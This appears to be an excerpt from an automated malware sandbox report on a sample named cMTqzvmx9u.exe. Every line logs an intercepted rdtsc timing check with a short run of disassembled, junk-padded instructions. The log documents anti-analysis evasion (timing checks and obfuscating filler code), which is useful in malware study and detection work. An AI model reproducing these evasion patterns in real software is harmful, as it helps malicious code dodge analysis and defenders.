                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1039A second address: D103AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jbe 00007F0EC450201Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D103AB second address: D103B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F0EC4CB7FC6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18879 second address: D18888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F0EC4502016h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18888 second address: D1888E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1888E second address: D1889B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0EC4502018h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1889B second address: D188A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18F7E second address: D18F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0EC4502016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18F89 second address: D18F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18F8F second address: D18FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC450201Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18FA5 second address: D18FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18FAB second address: D18FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D19592 second address: D19598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D19598 second address: D195A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D195A1 second address: D195B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4CB7FD3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D195B8 second address: D195BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D195BC second address: D195C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1C5A1 second address: D1C5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D20458 second address: D2045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2045C second address: D2046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0EC4502016h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE720 second address: CDE751 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0EC4CB7FD1h 0x00000008 pop edi 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F0EC4CB7FCCh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE751 second address: CDE755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE755 second address: CDE76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE76F second address: CDE775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE775 second address: CDE780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CEA29D second address: CEA2BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CEA2BE second address: CEA2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2398A second address: D2398E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2398E second address: D23994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D23994 second address: D2399A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2399A second address: D239C8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0EC4CB7FCEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007F0EC4CB7FC6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0EC4CB7FDAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D23C8F second address: D23C99 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0EC450201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D23C99 second address: D23CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240A8 second address: D240AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240AC second address: D240B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC4CB7FC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240B6 second address: D240C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D552F1 second address: D55308 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0EC4CB7FD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55474 second address: D5547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5547C second address: D554DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0EC4CB7FDDh 0x0000000b jmp 00007F0EC4CB7FD7h 0x00000010 push esi 0x00000011 jmp 00007F0EC4CB7FD1h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 popad 0x0000001a push edx 0x0000001b jo 00007F0EC4CB7FCEh 0x00000021 jno 00007F0EC4CB7FC6h 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pushad 0x0000002a jmp 00007F0EC4CB7FD3h 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55AB6 second address: D55ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55ABA second address: D55AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0EC4CB7FD0h 0x0000000d jmp 00007F0EC4CB7FD3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55D8C second address: D55DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jne 00007F0EC4502016h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DA3 second address: D55DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DA7 second address: D55DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DAD second address: D55DC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD3h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DC5 second address: D55DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55F1E second address: D55F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55F26 second address: D55F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C44B second address: D5C455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C455 second address: D5C466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F0EC4502016h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEB3 second address: D5AEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEBB second address: D5AEDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0EC4502016h 0x00000010 jmp 00007F0EC4502020h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEDB second address: D5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEE5 second address: D5AEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEEB second address: D5AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B5E2 second address: D5B5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4502023h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B5FB second address: D5B617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B617 second address: D5B61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B61D second address: D5B62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5BCCB second address: D5BCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5BCCF second address: D5BCDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0EC4CB7FCEh 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2A9 second address: D5C2B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2B7 second address: D5C2C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2C0 second address: D5C2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2C6 second address: D5C2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F0EC4CB7FD0h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F0EC4CB7FD1h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2F8 second address: D5C2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CE1D00 second address: CE1D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D61B3A second address: D61B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0EC4502016h 0x0000000a jmp 00007F0EC450201Eh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D254A1 second address: D1039A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0EC4CB7FCEh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 jmp 00007F0EC4CB7FCAh 0x00000018 mov dl, 8Fh 0x0000001a call dword ptr [ebp+122D1DBBh] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2556E second address: D25586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0EC450201Bh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25586 second address: D25632 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0EC4CB7FD3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b jne 00007F0EC4CB7FCCh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 stc 0x00000019 jmp 00007F0EC4CB7FCAh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 xor cl, FFFFFFC6h 0x00000028 mov dword ptr [ebp+1248A24Ch], esp 0x0000002e mov dh, CAh 0x00000030 cmp dword ptr [ebp+122D2E3Ch], 00000000h 0x00000037 jne 00007F0EC4CB80CCh 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F0EC4CB7FC8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 mov ecx, dword ptr [ebp+122D2F98h] 0x0000005d mov byte ptr [ebp+122D336Dh], 00000047h 0x00000064 mov edi, dword ptr [ebp+122D30E4h] 0x0000006a mov eax, D49AA7D2h 0x0000006f mov dx, 68E2h 0x00000073 nop 0x00000074 pushad 0x00000075 je 00007F0EC4CB7FCCh 0x0000007b jg 00007F0EC4CB7FC6h 0x00000081 push ebx 0x00000082 jnl 00007F0EC4CB7FC6h 0x00000088 pop ebx 0x00000089 popad 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25632 second address: D25649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25A68 second address: D25AD5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F0EC4CB7FC6h 0x00000013 popad 0x00000014 jmp 00007F0EC4CB7FD2h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F0EC4CB7FD7h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push ebx 0x00000029 pushad 0x0000002a popad 0x0000002b pop ebx 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f jmp 00007F0EC4CB7FD1h 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 pushad 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push esi 0x0000003d pop esi 0x0000003e popad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25AD5 second address: D25ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25BE7 second address: D25BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25BED second address: D25BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26417 second address: D2648F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F0EC4CB7FC8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jc 00007F0EC4CB7FC6h 0x00000029 mov edi, dword ptr [ebp+122D1DBBh] 0x0000002f push 0000001Eh 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F0EC4CB7FC8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b nop 0x0000004c js 00007F0EC4CB7FCEh 0x00000052 push eax 0x00000053 jnp 00007F0EC4CB7FC6h 0x00000059 pop eax 0x0000005a push eax 0x0000005b pushad 0x0000005c je 00007F0EC4CB7FCCh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2648F second address: D26497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26497 second address: D2649B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D265EE second address: D265F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64ED2 second address: D64EE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F0EC4CB7FC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EE1 second address: D64EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EED second address: D64EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EF3 second address: D64EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EF9 second address: D64F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
